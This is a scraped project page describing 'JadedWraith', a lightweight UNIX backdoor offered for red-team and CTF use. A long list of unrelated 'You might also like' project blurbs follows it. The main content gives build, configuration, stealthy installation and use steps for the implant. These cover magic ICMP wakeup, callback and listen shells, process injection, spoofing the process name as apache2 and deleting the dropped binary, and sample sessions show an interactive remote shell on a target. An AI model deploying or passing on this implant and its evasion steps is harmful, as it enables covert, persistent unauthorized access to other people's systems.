Light-weight UNIX backdoor

Overview

JadedWraith

Lightweight UNIX backdoor for ethical hacking. Useful for red team engagements and CTFs. Something I wrote a few years ago as part of a game I was playing with a friend to try to backdoor as many VMs in each other's labs without being caught or having our tools reverse engineered/signatured.

Features

JadedWraith is a powerful backdoor capable of either listening on a TCP port or sniffing packets for a "magic" ICMP packet instructing the backdoor to either callback or listen. This is partly inspired by tools such as PRISM, however, unlike PRISM JadedWraith incorporates shoddy cryptography to obfuscate command and control. JadedWraith can be used to execute remote commands or upload follow on payloads.

JadedWraith can be compiled as a standalone executable or as a shared object for process injection.

Components

The source code for the actual implant can be found inside the src directory. client contains a simple python based client for interacting with JadedWraith. The conf_jawr script is used to configure new JadedWraith executables.

Dependencies

The implant requires a modern C library and libpthread. Depending on the target operating system, libpcap may be required (In which case, it you must run the ./configure script with --use-libpcap to enable libpcap support).

The Python configuration script and client require the the following packages to work: termcolor, pycryptodomex

How to compile

Simply use the Makefile to compile. Note: The resulting binaries found in bin must be configured before they can be used.

$ ./configure
$ make
$ ls -lart bin
-rwxrwxr-x. 1 root root 19712 Jul 31 13:08 JadedWraith-2.0.0-Linux-x86_64.elf

How to configure

Use the conf_jawr script to configure JadedWraith executables. It will search the bin directory for JadedWraith executables to configure. The configured binary will be written to the configured directory.

$ ./conf_jawr
JadedWraith Configuration

Please choose a JadedWraith binary to use: 
    1. JadedWraith-2.0.0-Linux-x86_64.elf
Binary : 1
Shared Key [95454c93c8d5d30a0782da72ade10e29] : 
Enable passive mode (ICMP wakeup) ? [y/n] y
Wakeup Password [4Zw2TTtaIKBcyeoLwd7rrTasRlUF90vSZnLFzn2A4ab018Vj] : 
argv[0] (Leave blank to not spoof command) [] : 

JadedWraith Executable : /tmp/JadedWraith/configured/builds/JadedWraith-2.0.0-Linux-x86_64.1627752415.bin

Try me!
   sudo ./wraith-client.py <IP_ADDRESS> -k 95454c93c8d5d30a0782da72ade10e29 -P 4Zw2TTtaIKBcyeoLwd7rrTasRlUF90vSZnLFzn2A4ab018Vj shell

How to install

A configured implant can simply be ran on the target system. If configured to use the passive ICMP functionality, it must be ran as root. The environmental variable _CMD can be used to spoof the process's argv[]

# cd /tmp
# nc -lvp 4444 > apache2
# chmod +x apache2
# _CMD="/usr/sbin/apache2" ./apache2
# rm apache2

How to interact

The wraith-client.py script inside client can be used to interact with JadedWraith. Simply invoke it with the arguments produced by the conf_jawr script, substituting the target's IP for <IP_ADDRESS>. If utilizing the ICMP functionality, the script must be ran as root to send the ICMP packet.

$ ~/JadedWraithFork/client> sudo ./wraith-client.py 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR shell
[+] sent ICMP wake up command to 192.168.100.224
[*] backdoor will listen on port 58290
[*] connecting to 192.168.100.224:58290
[+] connection established!
[*] entering interactive shell
>> .cd /tmp 
>> w
 14:22:49 up  3:02,  1 user,  load average: 0.18, 0.19, 0.23
USER     TTY        [email protected]   IDLE   JCPU   PCPU WHAT
>> ps -ef
UID          PID    PPID  C STIME TTY          TIME CMD
root           1       0  0 11:20 ?        00:00:01 /usr/lib/systemd/systemd --switched-root --system --deserialize 31
>> .exit
$ sudo ./wraith-client.py 127.0.0.1 --callback 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR shell
[+] sent ICMP wake up command to 127.0.0.1
[*] backdoor will connect to port 37943
[*] listening on port 37943
[+] accepted connection!
[*] entering interactive shell
>> 

Bugs

I'm sure this has plenty of bugs. Let me know if you find any. I wrote this over a few days and the code isn't my proudest. Feel free to report any issues and I'll try to fix them.

You might also like...
nanomsg-next-generation -- light-weight brokerless messaging

nng - nanomsg-next-gen ℹ️ If you are looking for the legacy version of nanomsg, please see the nanomsg repository. This project is a rewrite of the Sc

Single header C++ logging library. It is extremely powerful, extendable, light-weight, fast performing, thread and type safe and consists of many built-in features. It provides ability to write logs in your own customized format. It also provide support for logging your classes, third-party libraries, STL and third-party containers etc.
pugixml is a Light-weight, simple and fast XML parser for C++ with XPath support

pugixml is a C++ XML processing library, which consists of a DOM-like interface with rich traversal/modification capabilities, an extremely fast XML parser which constructs the DOM tree from an XML file/buffer, and an XPath 1.0 implementation for complex data-driven tree queries. Full Unicode support is also available, with Unicode interface variants and conversions between different Unicode encodings (which happen automatically during parsing/saving).

Poseidon OS (POS) is a light-weight storage OS

Poseidon OS Poseidon OS (POS) is a light-weight storage OS that offers the best performance and valuable features over storage network. POS exploits t

A light-weight Flutter Engine Embedder based on HADK ,which for Android devices that runs without any java code

flutter-hadk A light-weight Flutter Engine Embedder based on HADK ,which for Android devices that runs without any java code 1.Build by android-ndk-to

Single header C++ logging library. It is extremely powerful, extendable, light-weight, fast performing, thread and type safe and consists of many built-in features. It provides ability to write logs in your own customized format. It also provide support for logging your classes, third-party libraries, STL and third-party containers etc.
Analytics In Real-time (AIR) is a light-weight system profiling tool

Analytics In Real-time Analytics In Real-time (AIR) is a light-weight system profiling tool that provides a set of APIs for profiling performance, lat

Ducktape is an Open source Light weight 2d Game Engine that gives utmost priority to user convenience.
Ducktape is an Open source Light weight 2d Game Engine that gives utmost priority to user convenience.

Ducktape is an Open source Light weight 2d Game Engine that gives utmost priority to user convenience. It is written in c++ and uses SFML and Box2d for graphics and physics respectively.

qpSWIFT is a light-weight sparse quadratic programming solver

qpSWIFT Light-weight sparse Quadratic Programming Solver Introduction qpSWIFT is light-weight sparse Quadratic Programming solver targetted for embedd

A light-weight music Discord bot using Orca.

What's the "Music Discord bot with C"? A light-weight music Discord bot using Orca for it's bot. It's easy to use and install. How to download and use

A very simple and light-weight drawing app made with qt and C++.
A very simple and light-weight drawing app made with qt and C++.

Blackboard A very simple and light-weight drawing app made with qt and C++. It supports tablet and pen pressure with the help of QTabletEvents. So you

Fast and Light-weight path smoothing methods for vehicles
Fast and Light-weight path smoothing methods for vehicles

path_smoother About Fast and Light-weight path smoothing methods for vehicles Denpendencies This project has been tested on Ubuntu 18.04. sudo apt-get

Simple, Fast, Light weight
Simple, Fast, Light weight

Welcome To PradoshOS Github! Index Main heading Setup Step 1 Step 2 Step 3 Step 4 Compilation of Bootloader Compilation of Kernel Compilation of Userl

A light-weight json parser.

pson pson is a lightweight parser and it support six type, null , bool, number, string, array, object, and it can parse the encoding of UTF-8. It's fa

FLTK - Fast Light Tool Kit - a cross-platform C++ GUI toolkit for UNIX(r)/Linux(r) (X11)

FLTK - Fast Light Tool Kit - a cross-platform C++ GUI toolkit for UNIX(r)/Linux(r) (X11)

Decoding light morse code with a light dependent resistor and Arduino board
Decoding light morse code with a light dependent resistor and Arduino board

Morse decoder The project's idea is very simple, the Arduino program has the responsibility to upload the sensor's data to the USB serial port.

Winsock accept() Backdoor Implant.
Winsock accept() Backdoor Implant.

WSAAcceptBackdoor This project is a POC implementation for a DLL implant that acts as a backdoor for accept Winsock API calls. Once the DLL is injecte

Header-only VMWare Backdoor API Implementation & Effortless VMX Patcher for Custom Guest-to-Host RPCs
Header-only VMWare Backdoor API Implementation & Effortless VMX Patcher for Custom Guest-to-Host RPCs

VmxHijack Header-only VMWare Backdoor API Implementation & Effortless VMX Patcher for Custom Guest-to-Host RPCs Sample // --- RPC Server Code (VmxHija

Linux Kernel module-less implant (backdoor)

0 KOPYCAT - Linux Kernel module-less implant (backdoor) Usage $ make $ sudo insmod kopycat.ko insmod: ERROR: could not insert module kopycat.ko: Inapp

Owner
I develop all the things
null
Drogon: A C++14/17 based HTTP web application framework running on Linux/macOS/Unix/Windows

English | 简体中文 | 繁體中文 Overview Drogon is a C++14/17-based HTTP application framework. Drogon can be used to easily build various types of web applicat

An Tao 8k Sep 20, 2022
Small utility that leverages eBPF to dump the traffic of a unix domain socket

UnixDump UnixDump is a small eBPF powered utility that can be used to dump unix socket traffic. System requirements This project was developed on a Ub

Guillaume Fournier 5 Dec 1, 2021
WSServer is a fast, configurable, and extendable WebSocket Server for UNIX systems written in C (C11).

WSServer a C WebSocket Server WSServer is a fast, configurable, and extendable WebSocket Server for UNIX systems written in C (C11). As of version 2.0

Morten Houmøller Nygaard 168 Sep 14, 2022
Faster termux-am implementation that connects to a receiver in termux-app using a unix socket

termux-am-socket This is a small program for sending commands to the Termux:API app, thereby allowing terminal programs to use the Android API. The pr

Termux 20 Sep 12, 2022
Wrapper for linux TCP/UDP/unix/USB socket connections

Socket Connection wrapper shared library Shared library that realize sockets connections and could transfer data-packages. Navigation Navigation Insta

Dmitry Golgovsky 7 Dec 21, 2021
Asynchronous, Header-only C++ HTTP-over-(TCP|UNIX Socket|STDIO) Library

CXXHTTP A C++ library implementing an asynchronous HTTP server and client. To clone this library, make sure you also clone the submodules. The --recur

null 25 Mar 19, 2021
🌱Light and powerful C++ web framework for highly scalable and resource-efficient web application. It's zero-dependency and easy-portable.

Oat++ News Hey, meet the new oatpp version 1.2.5! See the changelog for details. Check out the new oatpp ORM - read more here. Oat++ is a modern Web F

Oat++ 5.7k Sep 21, 2022
Light and fast program for remote control of a computer.

DeskX - Remote control program About The project was created for its own use within the home local network (you can use DeskX over the internet using

DeskX 119 Sep 24, 2022
sbase is a collection of unix tools that are inherently portable across UNIX and UNIX-like systems.

sbase is a collection of unix tools that are inherently portable across UNIX and UNIX-like systems.

Anton Samokhvalov 1 Nov 1, 2021
Harsh Badwaik 1 Dec 19, 2021